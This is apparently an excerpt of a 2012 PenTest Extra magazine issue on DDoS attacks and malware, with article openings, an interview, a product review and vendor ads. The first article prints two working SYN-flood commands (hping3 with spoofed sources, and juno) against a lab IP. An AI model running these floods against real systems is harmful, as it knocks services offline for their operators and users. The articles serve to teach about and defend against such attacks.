DDoS Attacks by PenTestMag

scanning isn’t enough Cyber Security Auditing Software

Device Auditing

• Device information remains confidential

Scanners

Nipper Studio

Audit without Network Traffic Authentication Configuration

• Settings that allow you to hide sensitive information in the report

Authorization Configuration Accounting/Logging Configuration Intrusion Detection/Prevention Configuration

• Low cost, scalable licensing

Password Encryption Settings

• Point and click GUI or CLI scripting

Timeout Configuration

• Audit without network traffic

Routing Configuration

Physical Port Audit VLAN Configuration Network Address Translation

It was refreshing to discover Nipper and to find that it supported so many devices that Cisco produces. Nipper enables Cisco to test these devices in a fraction of the time it would normally take to perform a manual audit. For many devices, it has eliminated the need for a manual audit to be undertaken altogether.

Network Protocols Device Specific Options Time Synchronization

Cisco Business Benefits to Cisco • Nipper quickly produces detailed reports, including known vulnerabilities. • By using Nipper, manual testing has been altogether eliminated for particular Cisco devices.

Multi-Platform Support for

Warning Messages (Banners)

Network Administration Services

Network Service Analysis

Password Strength Assessment

Software Vulnerability Analysis

Network Filtering (ACL) Audit

Wireless Networking

VPN Configuration

* Limitations and constraints will prevent a detailed audit

Nipper Studio reduces manual auditing time by quickly producing a consistent, clear and detailed report. This report will; 1.

Summarize your network’s security

Highlight vulnerabilities in your device configurations

Rate vulnerabilities by potential system impact and ease of exploitation (using CVSSv2 or the established Nipper Rating System)

Provide an easy to action mitigation plan based on customizable settings that reflect your organizations systems and concerns.

Allow you to add previous reports and enable change tracking functionality. You can then easily view the progress of your network security.

for free at enquiries@titania.com T: +44 (0)845 652 0621

www.titania.com

CONTENTS

Dear Readers, PenTest Extra tries to select topics that need extra attention. In every field there are obvious things, easy aspects, “everyone-knows-howto-do-this” issues. DDoS Attacks are one of them. Everyone heard

DDoS

06 How To Mitigate DDoS Attacks? Intro duction to DDoS Cyberwar Tool By Deniz Eren

about them, everyone thinks that DDoS is a topic that can't surprise. PenTest accepted the challenge and dares to say that this issue provides valuable articles worth your time and money. Six articles in the section “DDoS” will endeavor to make of DDoS the most informative, eye-opening and interesting section ever. We start with Deniz Eren's article “How to Perform DDoS Attacks and Mitigation”. This great tutorial will lead you through the attack's types, tools

This article's purpose is to give a brief description about DDoS attack types and tools used by attackers, after that, I will give a more deeply explanation about mitigation techniques against DDoS attacks.

16 Penetrating with DDoS Attacks

By Charalampos Z. Patrikakis and Angelos-Christos Anadiotis

along with deeper explanation of mitigation techniques. Next article “Penetration with DDoS Attacks” is supplements the previous one and makes sure that a reader will be from now on able to look beyond “the raw statistics”. Ramiro Caire provides a practical tour with two types of attacks – "SYN flood" and "Slow HTTP DDoS Attack". Jeremy Nicholls' article is business oriented and elaborates on democratisation of DDoS and provides an answer to the question “Why Should Business Care about DDoS”? Pierluigi Paganini, you are well familiar with this great author, proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic

You know, or at least you have heard about them, and you may even know the way to protect against it (or try to confront the attackers). But, are you sure you have considered the magnitude of the problem? Have you ever looked into the problem from a distance, to see the actual importance beyond raw statistics on attacks?

24 DDoS: Coordinated Attacks Analysis By Ramiro Caire

targets for different purposes. His article also includes a specific part on the new factors that could support DDoS attacks such as the introduction of IPv6 protocol and the diffusion of mobile platforms. For a dessert we propose an article concerning CoD4 servers usage to launch DDoS attacks against innocent web sites. This is definitely not all we have prepared for PenTest Extra Readers. The “Malware”section includes three articles. Timothy Nolan, also known to you and our great contributor, prepared for you

This article will cover some concepts about a well-known attack named DDoS (Distributed Denial-of-Service) with some lab demonstrations as a “Proof of Concept” with countermeasures. In this paper we will focus on two types of attacks, which are "SYN flood" and "Slow HTTP DDoS Attack".

32 Why Should Businesses Care about DDoS By Jeremy Nicholls

an article abut “Defending Against Malicious Code & Maliciou For The Non-Reversing Defender”. Do you have a Facebook profile? Of course, you do. Next article will make you familiar with “Facebook Threats”. Last article in this section is devoted to “Vulnerabilities in Common Platforms and Lax Security Practices”. Have you heard about Baltic Cyber Shield? Hannes Holm gives you a great summary of the research that was a result of red team versus blue team exercises.

The risk of DDoS attacks has increased in tandem with the proliferation of DDoS attack tools and services. This article provides an overview of a number of these tools in order to both raise awareness of the diversity of attacks and provide a window into the underground DDoS economy itself.

40 DDoS Attacks: So Simple, So Dangerous By Pierluigi Paganini

“Interview”section guests Colin Doherty, President of Arbor Networks, the world leader in DDoS mitigation solutions. In the “Review” Section you can learn about Sucuri – a company that will remotely crawl your website and check for malicious code, defacements, phishing sites, blacklisting status and a host of other undesirable elements. I hope that you will find this issue worthwhile. If you have any suggestions for us concerning topics, problems you want to read about or people you would like to know better thanks to PenTest please, feel free to contact us at en@pentestmag.com.

The article proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. The discussion is supported with the statistics provided by the principal security firms that provide solutions to protect infrastructures from this kind of attacks.

46 Sites Fall Prey to Botnet of Call of Duty 4 Game Servers! By Reto Muller

Enjoy reading! Malgorzata Skora & PenTest Team

EXTRA 05/2012(9)

Administrators of CoD4 servers must be aware of the fact their machines can and are being used to launch DDoS attacks against innocent web sites.

Page 4

http://pentestmag.com

CONTENTS

Malware

48 Defending Against Malicious Code & Malicious Activity For The Non-Reversing Defender By Timothy Nolan

It will provide information about resources that exist to provide early warning of newly emerging vulnerabilities and threats to arm the security analyst with the information necessary to effectively defend and protect their networks and systems.

66 Facebook Threats: Evolution in the Last Few Months By Niranjan Jayanand

In 2012 we saw malware authors still not giving up and trying to affect Facebook and other users luring them into clicking anonymous links which result in scamming and spamming across the victim 's contacts. In this article you will learn about four tricks used by Facebook malware authors.

78 Vulnerabilities in Common Platforms and Lax Security Practices Are Making Criminals’ Lives Easier By Andrew Browne

In late 2008, the Conficker worm spread far and wide by exploiting a vulnerability in a network service (MS08-067[1]) that allowed a successful attacker to run malicious code on a compromised machine.

Research

80 Baltic Cyber Shield: Research from a Red Team versus Blue Team Exercise By Hannes Holm

This article describes one of the few red team versus blue team exercises to date that focused on producing research, namely, the Baltic Cyber Shield (BCS). Various research have been conducted based on the data gathered during this exercise – this article describes two of these studies.

Interview

88 Interview with Colin Doherty – President, Arbor Networks By Aby Rao

Threats are complex and the hacking community is innovating at a pace that we have not seen before. DDoS requires a purposebuilt solution. You cannot effectively re-deploy existing security solutions like a firewall and expect them to perform the core function they were designed for AND solve the DDoS problem.

Review

TEAM Supportive Editor: Małgorzata Skóra malgorzata.skora@pentestmag.com Product Manager: Małgorzata Skóra malgorzata.skora@pentestmag.com Betatesters / Proofreaders: Ed Werzyn, Johan Snyman, Jeff Weaver, William Whitney, Marcelo Zúniga Torres, Harish Chaudhary, Steven Wierckx, Stefanus Natahusada, Gareth Watters, Wilson Tineo Moronta, Emiliano Piscitelli, Dyana Pearson, David Kosorok Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic ewa.dudzic@software.com.pl Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca andrzej.kuca@software.com.pl Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. program To create graphs and diagrams we used by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

92 What you see is not always what you get in the world of drive-by hacking: Sucuri Solutions By Jim Halfpenny EXTRA 05/2012(9)

Page 5

http://pentestmag.com

DDoS

How To Mitigate DDoS Attacks? Introduction to DDoS Cyberwar Tool This article's purpose is to give a brief description about DDoS attack types and tools used by attackers, after that, I will give a more deeply explanation about mitigation techniques against DDoS attacks.

efore going deep into mitigation, we should know which types of common attacks exist and which tools are used to simulate these attacks. It is important to understand roots of attacks to mitigate them.

Attack Types

TCP SYN Flooding Attacks

As mentioned in RFC 4987 TCP SYN flood weakness was first discovered in 1994 by Bill Cheswick and Steve Bellovin. They included and then removed a paragraph about the attack in their book "Firewalls and Internet Security: Repelling the Wily Hacker". After two years of description of this attack an exploit tool was released in Phrack Magazine. After a short time, TCP SYN flooding attacks started to be observed in the real world and caused service outages. In order to understand the attack, first we should understand how a TCP connection is established. It is done in three steps: • Client sends SYN request to server • Server responds with SYN-ACK packet • Client sends ACK packet, and TCP connection is established In TCP SYN flood attack, an attacker sends a sequence of SYN requests and the server sends EXTRA 05/2012(9)

SYN-ACK packets in return, after that the server waits for ACK response and keeps half-open connections in backlog queue. If the server's backlog queue is filled, the server cannot respond to new connections. Since an attacker can send source IP spoofed SYN packets very fast, this queue can be filled very fast with tools like hping, juno, etc. This may results in a non-responding server after a while. Example attacks SYN flood from a random source IP spoofed SYN packets to all ports starting from 23th port of victim.

$ hping3 --rand-source -p ++22 --flood -S 192.168.0.27

SYN flood from an attacker's IP to port 22 of victim. With making little changes in source code of juno some other capabilities could be added.

$ ./juno 192.168.0.27 22

UDP Flooding Attacks

UDP flood attacks have the same logic, attacker sends a bunch of packets. First we should know what happens when UDP request is unsuccessful. The user sends a UDP packet to a

Page 6

http://pentestmag.com

DDoS

Penetrating with DDoS Attacks You know, or at least you have heard about them, and you may even know the way to protect against it (or try to confront the attackers). But, are you sure you have considered the magnitude of the problem? Have you ever looked into the problem from a distance, to see the actual importance beyond raw statistics on attacks?

ell, let’s see: how would you feel, if you were assaulted, and could not tell anyone about it? According to Kaspersky Lab's Yury Namestnikov: “Organizations rarely publicize the fact that they have been targeted by DDoS attacks in order to protect their reputation” [1]. How would you feel if one individual out of two in your living environment were infected by a contagious disease? According to Kaspersky Security Network, in Q2 2011 almost every second machine (48%) in Indonesia, was subjected to a local malware infection attempt. Or how would you feel if your computer and networking infrastructure was experiencing serious problems for more than two months? Again according to Kaspersky Security Network report for Q2 2011, the longest attack for that period lasted a bit longer than 60 days. Finally, how serious damage would you consider it, if your network of 100 million gamers was attacked and was put out of service? Well, SONY did suffer from this just a year ago [2]. I think that the facts behind the numbers tell the full story: DDoS attacks are very serious, and in an always, everywhere and anytime connected world they are a real nightmare. In the rest of this article we will define the notion of the denial and the distributed denial of service attacks while we will also identify their clasEXTRA 05/2012(9)

sification according to related work performed in the field in an academic level. Then, we will provide references to some of the most famous denial of service attacks as well as certain famous tools that have successfully been used in the past. Finally, we will refer to certain countermeasures that can be applied for preventing such attacks, even though no deterministic method has been implemented so far that can identify a sophisticated distributed denial of service attack.

A Bit of Background

According to the WWW Security FAQ [3], “Denial of Service (DoS) is an attack designed to render a computer or network incapable of providing normal services”. The distributed denial of service (DDoS) attacks can be seen as simple DoS ones which are performed by multiple, possibly infected, hosts against the victim-service provider. This kind of attack targets at the consumption of all available resources of the service provider, especially the ones with finite capacity and low flexibility, such as memory, CPU power and bandwidth. In detail, the WWW Security FAQ provides the following definition for DDoS attacks: “A Distributed Denial of Service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server

Page 16

http://pentestmag.com

DDoS

DDoS: Coordinated Attacks Analysis This article will cover some concepts about a well-known attack named DDoS (Distributed Denial-of-Service) with some lab demonstrations as a “Proof of Concept” with countermeasures. In this paper we will focus on two types of attacks, which are "SYN flood" and "Slow HTTP DDoS Attack".

t is likely that you already know this attack named Distributed Denial-of-Service (DDoS) which is an extension of the classic well-known DoS (Denial of Service) that arise when the target server is overloaded with TCP or UDP requests to particular service (usually running on the port 80, web service, but this depends on the intentions of the attacker, any service could be vulnerable) leaving respond to genuine requests. The concept of "Distributed" is concerning that these requests are made from hundreds, thousands of infected machines (commonly called "zombies") which are governed by "botnets" (http://

Figure 1. Client establish a healthy connection with the server EXTRA 05/2012(9)

en.wikipedia.org/wiki/Botnet) in a coordinated manner at the same time, which is a sum of bandwidth, memory and processing consumption on the target that, generally, any server could not handle ending in a collapse of service targeted due to the failure to answer each request. The key to success in DDoS attacks is the number of "zombies" available on each Botnet. We can say that the greater the number of machines attackers, the worse the attack is. As an example, let’s do the following quick estimate: 3000 hosts * 128 KiB/s (common home-users upstream) = 384000 KiB/s = 375 MiB/s

Figure 2. Crafted packages are sent to the server Page 24

http://pentestmag.com

DDoS

Why Should Businesses Care about DDoS The risk of DDoS attacks has increased in tandem with the proliferation of DDoS attack tools and services. This article provides an overview of a number of these tools in order to both raise awareness of the diversity of attacks and provide a window into the underground DDoS economy itself.

he Internet is an ideal destination for likeminded people to come together. This is as true for people who are reaching out to friends, colleagues and strangers to raise money for charity as it is for groups of individuals who plan on using cyber attacks to make political or ideological statements. It is the latter group – ‘hacktivists’ as they have come to be called – who are having a profound impact on today’s security threat landscape. Research from Arbor Networks’ annual Worldwide Infrastructure Security Report (a survey of the Internet operational security community published in February 2012), supports this. Ideologically-motivated hacktivism and vandalism were cited by a staggering 66% of respondents as a motivating factor behind distributed denial-ofservice (DDoS) attacks on their businesses. An example would be an attack we saw earlier this year targeting the BBC (British Broadcasting Corporation). The attack took down email and other internetbased services and the BBC suspected the attack was launched by Iran’s cyber army in a bid to disrupt BBC Persian TV. Likewise, the attack on the Formula 1 website, which took place in response to violent protests in Bahrain ahead of a competition. EXTRA 05/2012(9)

Democratisation of DDoS

But it’s not just high-profile, politically-connected organizations which are at risk. Any enterprise operating online – which applies to just about any type and size of business operating in Europe – can become a target, because of who they are, what they sell, who they partner with or for any other real or perceived affiliations. Nobody is immune. In many respects, the Internet underground economy functions in ways that are similar to legitimate sectors of the IT industry. One characteristic shared by both the underground and legitimate sectors is new technologies and applications of those technologies create a self sustaining cycle of growth and innovation. There has been an explosion of DDoS attack tools and services that empower anyone with an Internet connection and a grievance to launch crippling attacks. The emergence of these tools and services is evidence of an expanding underground economy that is finding new applications and markets for denial of service. These range from one on one attack tools that Internet gamers use to take rivals offline to complex, opt-in tools that hacktivists use to take down websites, to tools used by those offering commercial DDoS services and blended attack tools used to cloak the theft of high value information.

Page 32

http://pentestmag.com

DDoS

DDoS Attacks So Simple, So Dangerous The article proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. The discussion is supported with the statistics provided by the principal security firms that provide solutions to protect infrastructures from this kind of attacks. The article also include a specific part on the new factors that could support DDoS attacks such as the introduction of IPv6 protocol and the diffusion of mobile platforms.

espite it is relatively easy to organize a DDoS attack, it still represents one of the most feared offensive forms for its ability to interfere with the services provided. DDoS attacks are widely used by hackers and hacktivists, but also represent a viable military options in the event of a cyber attack against critical enemy structures. According to “Worldwide Infrastructure Security Report” published by Arbor Networks, a leading provider of network security and management solutions, Ideologically-Motivated ‘Hacktivism’ and vandalism

are the most readily-identified DDoS. Arbor Networks has provided evidence that in 2011 behind the majority of DDoS attacks there were group of hacktivists that have involved critical masses in the manifestation of their dissent, 35% reported political or ideological attack motivation meanwhile 31% reported nihilism or vandalism as attack motivation. Today it is possible to retrieve tool for DDoS attacks freely such as the famous “low orbit ion cannon” (LOIC), and it’s equally simple rent a botnet with a few tens of dollars, this factor have trans-

Figure 1. Attack Motivations Considered Common or Very Common EXTRA 05/2012(9)

Page 40

http://pentestmag.com

DDoS

Sites Fall Prey to Botnet of Call of Duty 4 Game Servers!

Administrators of CoD4 servers must be aware of the fact their machines can and are being used to launch DDoS attacks against innocent web sites. Any self-respecting admin should place necessary restrictions and take measures to prevent this awkward situation and not lose face to thugs due to sheer ignorance.

he frontline of DDoS Mitigation often presents curious attack scenarios, some not very clever, while others truly ingenious in their simplicity. Some attacks are quick and cheap, while some last for ages, hitting with fantastic rates – just like the one we recently mitigated for a client – an online news portal, whom someone did not like at all and went all out to try and pound to pulp. Peaking at 45.67 mpps, the flood proved to be a real challenge to mitigate. Beside the regular sheaf of your ordinary SYN, Connection, UDP or HTTP floods and their multiple variations, you get to see the fruit of devious minds’ inventions and inevitably ask yourself: what would criminal minds think of next?

It’s hard to tell, yet anyone doing business in the Internet should at least have a general understanding of the risks involved. Risks associated with someone eying their sites for victimization, or designing schemes to use unsuspecting resources into launching a DDoS attack on pre-targeted victims. No, we are not talking about the ordinary botnet here, the one that is purchased by the hour. We are talking about the risks of running a popular title game server for example, which in our case is used for dark purposes, instead of bringing pure joy and entertainment. Hacking relies on finding and exploiting flaws in an application or a connection protocol, or both. A DDoS attack is orchestrated so either network, or

Figure 1. Aggregated Attack Graph of 45.67 mpps successfully mitigated attack EXTRA 05/2012(9)

Page 46

http://pentestmag.com

Malware Defending

Against Malicious Code & Malicious Activity For The Non-Reversing Defender

This article will provide information about resources that exist to provide early warning of newly emerging vulnerabilities and threats to arm the security analyst with the information necessary to effectively defend and protect their networks and systems. It will provide the incident responder with some basic tasks, capabilities, intelligence, and resources to enable the responder to rapidly gain understanding about new emerging threats and new zero-day malicious binaries, about attackers, their motivations, and the infrastructure leveraged in their attacks.

his article is a non-exhaustive description of just some of the resources and activities that an information security analyst can and should do to obtain rapid information about potentially malicious files or activity. This article is purposefully non-exhaustive. There are so many tools, techniques, and resources available that it extends well beyond the capacity of this article or even this publication to contain enough information to describe them in any appreciable way. Perhaps these are the subject of many future articles yet to come on this subject. In fact, a deep-dive on the features of the malware sandboxes and binary and memory analysis tools could easily be comprehensive articles in and of themselves. This article also deals with the subject in an informal and basic manner, but has enough information to be useful to any security professional combatting malware in their environment.

Early Warning â&#x20AC;&#x201C; Resources for Understanding Emerging Vulnerabilities, Threats, and Malicious Code

Information Security professionals are constantly having to deal with new and previously unknown malware, sometimes with new capabilities and features. Every day there are new emerging threats, attack techniques, and newly discovered vulnerabilities. It is critical that the security proEXTRA 05/2012(9)

fessional stay abreast of information about new threats, types of attack, attack techniques, tools, vulnerabilities, malware, countermeasures, workarounds, patches, and similar information in order to proactively protect their networks. Failure to do so may mean that threats are not realized nor understood until they are already creating loss, damage, disruption and havoc for your organization. In addition, building a capacity for obtaining threat intelligence and reputation information will put you ahead of the curve. You will be able to identify new and unknown malicious activity by attributes and artifacts that you or others have gathered and documented related to previous instances of malicious code or activity. Threat intelligence, which is information related to artifacts from instances of prior compromises, site (domain name and IP address) reputation data, and other items can be a powerful intelligence base to guide and inform the defender. And there are myriad resources available to assist the defender in understanding what new threat may have befallen them, even if it has never been seen by anyone previously. The intent of this article is to bring some focus to some of the many resources available to the defender, and to show how you don't have to necessarily be a malware reverser or expert-level coder to still be able

Page 48

http://pentestmag.com

Can you afford not to invest in software testing? Put our knowledge and experience to work for you

Training ps_testware is not only an accredited provider of all ISTQB-courses, but also offers certification, on-demand and tailor made trainings on structured software testing and related fields, like for example agile, requirements and security testing.

Consultancy

ps_testware provides expert advice on software testing, from assessing your current test organization and efficiency to developing a specific security, performance or automation testing strategy or on the job coaching.

Managed Staffing

ps_testware staff consists exclusively of experienced software testers who hold at least one ISTQB-certificate. A pro-active attitude, flexibility and professionalism are at the heart of their daily work on your project.

www.pstestware.com

info@pstestware.com

+32 16 35 93 80

Belgium I France

secureninja.com

Forging IT Security Experts

• Security+ • CISSP® • CEH (Professional Hacking) v7.1 • CAP (Certified Authorization Professional) • CISA • CISM • CCNA Security • CWNA • CWSP • DIACAP • ECSA / LPT Dual Certification • ECSP (Certified Secure Programmer) • EDRP (Disaster Recovery Professional) • CCE (Computer Forensics) • CCNA Security

Expert IT Security Training & Services

• CHFI • ISSEP • Cloud Security • Digital Mobile Forensics • SSCP • Security+ • Security Awareness Training … And more

Free Hotel Offer on Select Boot Camps Offers ends on Jan 31, 2012 – Call 703-535-8600 and

mention code: PentestNinja to secure your special rate.

Welcome Military – Veterans Benefits & GI Bill Post 9/11 Approved WIA (Workforce Investment Act) Approved

www.secureninja.com

703 535 8600

Malware

Facebook Threats Evolution in the Last Few Months

4 tricks used by Facebook malware authors: • Catchy words promising great videos resulting in multiple redirections • Links posted on a friend's chat window resulting in downloading the file name Picturexx. JPG_www.facebook.com which are Facebook worm. • Malicious links asking the victim to install or upgrade to the latest Flashplayer.

• LilyJade worm using the CrossRider platform targeting IE, Firefox and Chrome users (Figure 1).

What We Believe Is the Seed of Multiple Infection

Among a group of friends the seed of infection comes when one or more users from the group/ community would have visited the public post page of Facebook where we can see a lot of Bogus posts. Few posts come with some catchy words like "Hey See This Now ","Watch this", "Celebrity leaked video", "I hate Rihanna after watching this video" etc.

Figure 1. Catchy Words Promising Great Videos Resulting in Multiple Redirections

Figure 3. A Primary Code Written by Malware Authors to Check the Browser Type

Figure 2. A Malicious Browser Plugin EXTRA 05/2012(9)

Figure 4. YouTube Plugin installed into Firefox Page 66

http://pentestmag.com

q: how much does Serenity cost?

a: it’s Priceless. Not stillness, not tranquility� but the serenity to do business online, as one should � unmolested. The site is built and launched, it has started making noise on the marketplace. Web servers are gently humming to the tune of orders ringing in, customers chirping, and purposefulness ful�lled. Life is good, not a cloud in the sky � just the daily, most welcome laborious bustle for earned reward, recognition and ever-growing customer satisfaction leading to loyalty and repeat orders. Word of mouth is you�re getting to be one of the best! GO ON, READ THE REST OF THE STORY...

Malware

Vulnerabilities in Common Platforms and Lax Security Practices Are Making Criminals’ Lives Easier In late 2008, the Conficker worm spread far and wide by exploiting a vulnerability in a network service (MS08-067[1]) that allowed a successful attacker to run malicious code on a compromised machine.

he worm was discovered on millions of infected machines in November 2008 with the number of infected machines skyrocketing to 10-15 million by January 2009. The media carried frequent reports about the outbreak – this was a major event. Maybe it shouldn’t have been. MS08-067 was patched several months earlier in October 2008. What happened? How did so many machines fall victim to Conficker? Microsoft’s Windows Update mechanism periodically checks for security updates and applies them automatically if it is properly configured. Ah... Malware attacks continue to plague Windows and Windows applications for a few reasons – the sheer amount of users, their general lack of security awareness and numerous exploit opportunities. Fast forward to 2012 and we see that lessons are still being learned the hard way. At the time of writing, r00tbeer[2] made headlines in EXTRA 05/2012(9)

Page 78

http://pentestmag.com

Research

Baltic Cyber Shield Research from a Red Team versus Blue Team Exercise

he first study concerns whether the vulnerability of a host influences the time required to capture it; the second study concerns whether cyber security professionals can predict success rates related to arbitrary code execution attacks. The first part of this article however introduces the reader to BCS as such.

Introduction

Red team versus blue team exercises on the topic of cyber security are employed in various scales and for various purposes, for example,

in academia for education, during DEFCONâ&#x20AC;&#x2122;s for competition and by government agencies for training (an overview of various exercises can be seen in Table 1. While there is an abundance of exercises, the empirical data produced by them, and consequently the research based on their results, are next to non-existent. This is a serious issue as this type of data is very hard to reliably capture in the wild. Sure, one could argue that honeypots such as Honeyd can be used to capture attacks. However, the data quality produced by a honeypot is often not sufficient as they are

Table 1. Cyber Defense Exercises Cyber defense exercise

Link

Annual Cyber Defense Exercise

www.nsa.gov/public_info/press_room/2010/cyber_defense.shtml

CSAW

www.poly.edu/csaw2011

Cyber Security Challenge

cybersecuritychallenge.org.uk/

Cyber storm

www.dhs.gov/files/training/gc_1204738275985.shtm

DEFCON

www.defcon.org/html/links/dc-ctf.html

Delaware's annual Cyber Security Exercise:

dti.delaware.gov/cyberexercise/default.shtml

Mid-Atlantic Regional Collegiate Cyber Defense Competition

midatlanticccdc.org

National Collegiate Cyber Defense Competition

www.nationalccdc.org/

National Cyber League

www.nationalcyberleague.org

Pwn2Own

dvlabs.tippingpoint.com/blog/2011/02/02/pwn2own-2011

UCSB International Capture The Flag

ictf.cs.ucsb.edu/

EXTRA 05/2012(9)

Page 80

http://pentestmag.com

* Availability is everything.. Labris DDoS Mitigator

interview

“It is easy to overpromise and underdeliver” Interview with Colin Doherty – President, Arbor Networks Threats are complex and the hacking community is innovating at a pace that we have not seen before. DDoS requires a purposebuilt solution. You cannot effectively re-deploy existing security solutions like a firewall and expect them to perform the core function they were designed for AND solve the DDoS problem.

Aby Rao: You have lot of experience in global market and leading various departments of a company. Please tell us a little bit about your career path.

bor’s solutions are able to identify and mitigate attacks in real-time, before they impact or disrupt services.

Colin Doherty: I grew up in Scotland and received a postgraduate degree from the Institute of Marketing in London. My business career has been in product management, and sales management. I spent about 16 years working for Nortel globally in a variety of positions, eventually running global business units in Latin America, North America and Europe for broadband and wireless technologies. At Arbor, I came in as SVP for worldwide sales and become company President in 2009.

Please tell us about Arbor Networks and the company's position in the industry as secure service control solutions.

CD: Arbor Networks is the world leader in DDoS mitigation solutions. Our customers include the vast majority of the world’s service providers and many of the largest enterprise networks in operation today. They rely on Arbor to ensure that their networks are resilient and can maintain availability, even while facing a cyber-attack. ArEXTRA 05/2012(9)

Does Arbor network have strategic partnership with other companies?

CD: Yes, Arbor has many business partnerships. On the technology side, we have a partnership with Alcatel-Lucent in which we embed our mitigation software into their 7750 service routers, enabling Internet Service Providers to have mitigation capabilities at the network perimeter, blocking attacks before they reach customer networks. As we’ve developed our enterprise business, we’ve also built a world-class networks of distribution and channel partners.

How have you transformed your company during your current tenure as the President?

CD: At the Macro level, this has been an incredibly difficult business environment globally, starting in the US and now rolling through Europe and Asia. That said, Arbor’s business has exploded in this time-frame, with record growth and prof-

Page 88

http://pentestmag.com

NEXT GENERATION

THREAT PROTECTION ONLINE SUMMIT LIVE 5th SEPTEMBER Join this free summit to hear industry experts and experienced practitioners discuss the current threat landscape, best prevention techniques and proven implementation methods.

FIND 17 thought leadership webinars LEARN about the latest industry trends SHARE the knowledge

To register for free and view the full lineup go to http://www.brighttalk.com/r/T2j

review What you see is not always what you get in the world of drive-by hacking

Sucuri Solutions There are plenty of businesses of all sizes who need to have a web presence to survive and thrive in the modern world, many of whom cannot afford a full-time IT support person let alone an information security expert. We have seen a paradigm shift in just who maintains websites with modern web applications enabling almost anyone to deploy rich, dynamic web sites.

eeping a web site up and effective can be a challenge. So what happens when one suffers a compromise? How can you detect and respond to finding out your website is hosting malware, has been defaced or is pumping out spam? Sucuri is a company offering an answer to this problem. The Sucuri website bears the tagline, “Protect Your Interwebs!,” and they present a unique offering in this area. Sucuri offers monitoring, alerting, removal and prevention of malware attacks on your web site.

How it works

Sucuri will remotely crawl your website and check for malicious code, defacements, phishing sites, blacklisting status and a host of other undesirable elements. You can receive notifications when content is added or updated allowing you to keep track of what changes and when. It will also check for key changes to your information relating to website including the IP address, the domain WHOIS details, SSL certificates and whether your website appears on any of the common blacklists of malicious sites, all important intelligence for ensuring your site is healthy and effective (Figure 1). All of these checks can be scheduled to run periodically to check up on the health of your web EXTRA 05/2012(9)

site. It’s best to repeat checks regularly as new detection signatures are added frequently as new threats emerge. You have a choice of notification methods including email, Twitter, instant messaging, SMS and a private RSS feed. You can also use the available API to integrate events and notifications into your reporting and monitoring tools.

Diving deeper

Anyone familiar with web malware will know that the bad guys don’t always make it easy for us and will employ techniques to prevent discovery. This includes serving malware only once to any given IP address, blacklisting IP addresses used by malware analysts and even displaying false takedown notices to confound investigators. What you see is not always what you get in the world of driveby hacking. One really cool feature from Sucuri is Server Side Scanning, offering a chance to catch the more evasive malware that remote web scanning might miss. It will also report on other findings such as the version of a number of popular web applications and plugins you have installed. Keeping track of the software you have installed is important as bugs in packages such as WordPress are a common point of entry, which brings us onto the subject of prevention.

Page 92

http://pentestmag.com

In the next issue of

Honeypots Available to download on September 17th More topics in PenTest Magazine: eBanking, eDiscovery, Sandbox, Biometrics, Phishing, Spoofing, SSH Tunelling, Guide to BackTranck, IAST, Cloud Application Pentesting, PCI Security Standards ... and more

If you would like to contact PenTest team, just send an email to malgorzata.skora@software.com.pl or ewa.dudzic@software.com.pl . We will reply a.s.a.p. PenTest Magazine has a rights to change the content of the next Magazine Edition.

Practical solutions to headline threats. Three days of information security insight. Only RSA® Conference Europe 2012 delivers the steps and strategies needed to protect your organisation’s assets. From managing smartphones and tablets, to the workplace risks from social media tools, get the techniques you want and the answers you need. Hear from highly regarded keynotes including Wikipedia founder Jimmy Wales, internationally renowned security technologist Bruce Schneier, and investigative journalist, author and broadcaster Misha Glenny – one of the world’s leading experts on cybercrime and global mafia networks.

• Leave with actionable solutions • Build your skills • Network with like-minded professionals • Stay informed, stay ahead

Date: 9 - 11 October Venue: Hilton London Metropole Hotel, U.K.

Hear how the world’s security experts manage challenges like:

• Mobile security • Data breaches • Hacktivism

• Cybercrime • Malware threats • Cloud computing

Get the practical insight your organisation needs. Attend and play your part in Europe’s most informative information security event.

Find out more at

www.rsaconference.com/pen ©2012 EMC Corporation. All rights reserved. RSA, the RSA logo and RSA Conferences are either registered trademarks or trademarks of EMC Corporation in the United States and/or other countries. All other products and services mentioned are trademarks of their respective companies. RSA Security U.K. Limited. Incorporated on June 6, 1996. Company Number: 3208788. Registered Office: 1 Carnegie Road, Newbury, Berkshire, RG14 5DJ, England

THE GREAT CIPHER MIGHTIER THAN THE SWORD

Virscent Technologies Pvt. Ltd., Ltd. a Brainchild of a team of IIT Kharagpur Graduates, Graduates has been Incubated in E-Cell Cell IIT Kharagpur. Kharagpur It is an IT Solutions & Training Company, Offering ffering Web, Security and Network Solutions, IT Consulting and Support Services to numerous clients across the Globe. We provide the following services: a. b. c. d.

Penetration Testing Multimedia Services Web Development Training: a. Corporate Training b. Classroom Training c. Training programs for Educational Institutions.

Our Partners: 1. E-Cell IIT Kharagpur 2. Education Project Council of India

Website: www.virscent.com Blog

: www.virscent.com/blog